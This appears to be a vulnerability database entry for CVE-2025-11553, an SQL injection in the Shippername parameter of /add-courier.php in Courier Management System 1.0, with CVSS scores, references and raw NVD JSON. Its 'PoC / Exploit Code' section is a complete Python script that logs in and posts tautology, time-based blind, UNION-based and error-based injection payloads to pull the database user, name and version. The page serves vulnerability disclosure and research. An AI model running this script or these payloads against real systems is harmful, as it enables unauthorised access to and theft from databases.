CVE-2025-11553

Description

A weakness has been identified in code-projects Courier Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /add-courier.php. Executing manipulation of the argument Shippername can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be exploited.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:carmelogarcia:courier_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Courier Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11553 PoC - SQL Injection in Courier Management System 1.0
# Vulnerable file: /add-courier.php
# Vulnerable parameter: Shippername

import requests

TARGET_URL = "http://target.com/add-courier.php"
USERNAME = "attacker_user"
PASSWORD = "attacker_pass"

# Step 1: Login to obtain session cookie (low privilege account required)
session = requests.Session()
login_payload = {
    "username": USERNAME,
    "password": PASSWORD,
    "login": "submit"
}
session.post("http://target.com/login.php", data=login_payload)

# Step 2: Exploit SQL injection via Shippername parameter
# Basic injection payload to bypass string context
sql_payload = "test' OR '1'='1' -- -"

# Time-based blind injection payload for data extraction
time_based_payload = "test' AND SLEEP(5) -- -"

# UNION-based injection payload to extract data
union_payload = "test' UNION SELECT 1,user(),database(),4,5 -- -"

# Step 3: Send malicious request
exploit_data = {
    "Shippername": union_payload,
    "Receivername": "victim",
    "Address": "test address",
    "Contact": "1234567890",
    "submit": "Add Courier"
}

response = session.post(TARGET_URL, data=exploit_data)
print(f"Status Code: {response.status_code}")
print(f"Response Length: {len(response.text)}")
print(f"Response Body:\n{response.text[:2000]}")

# Step 4: Extract database information via error-based or blind injection
# Example: Extract database version
version_payload = "test' AND 1=CONVERT(@@version USING utf8) -- -"
exploit_data["Shippername"] = version_payload
response = session.post(TARGET_URL, data=exploit_data)
if "error" in response.text.lower() or "version" in response.text.lower():
    print("\n[!] Database version potentially leaked in error message")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11553
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11553
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11553/
[4] VulDB https://vuldb.com/cve/CVE-2025-11553
[5] https://code-projects.org/
[6] https://github.com/QuJun1/cve/issues/5
[7] https://vuldb.com/?ctiid.327713
[8] https://vuldb.com/?id.327713
[9] https://vuldb.com/?submit.670287
[10] https://github.com/QuJun1/cve/issues/5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11553", "sourceIdentifier": "[email protected]", "published": "2025-10-09T20:15:36.947", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in code-projects Courier Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /add-courier.php. Executing manipulation of the argument Shippername can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:carmelogarcia:courier_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "B6A68C07-333F-4BBA-84AE-DB7B0FE774EC"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/QuJun1/cve/issues/5", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327713", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327713", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.670287", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/QuJun1/cve/issues/5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}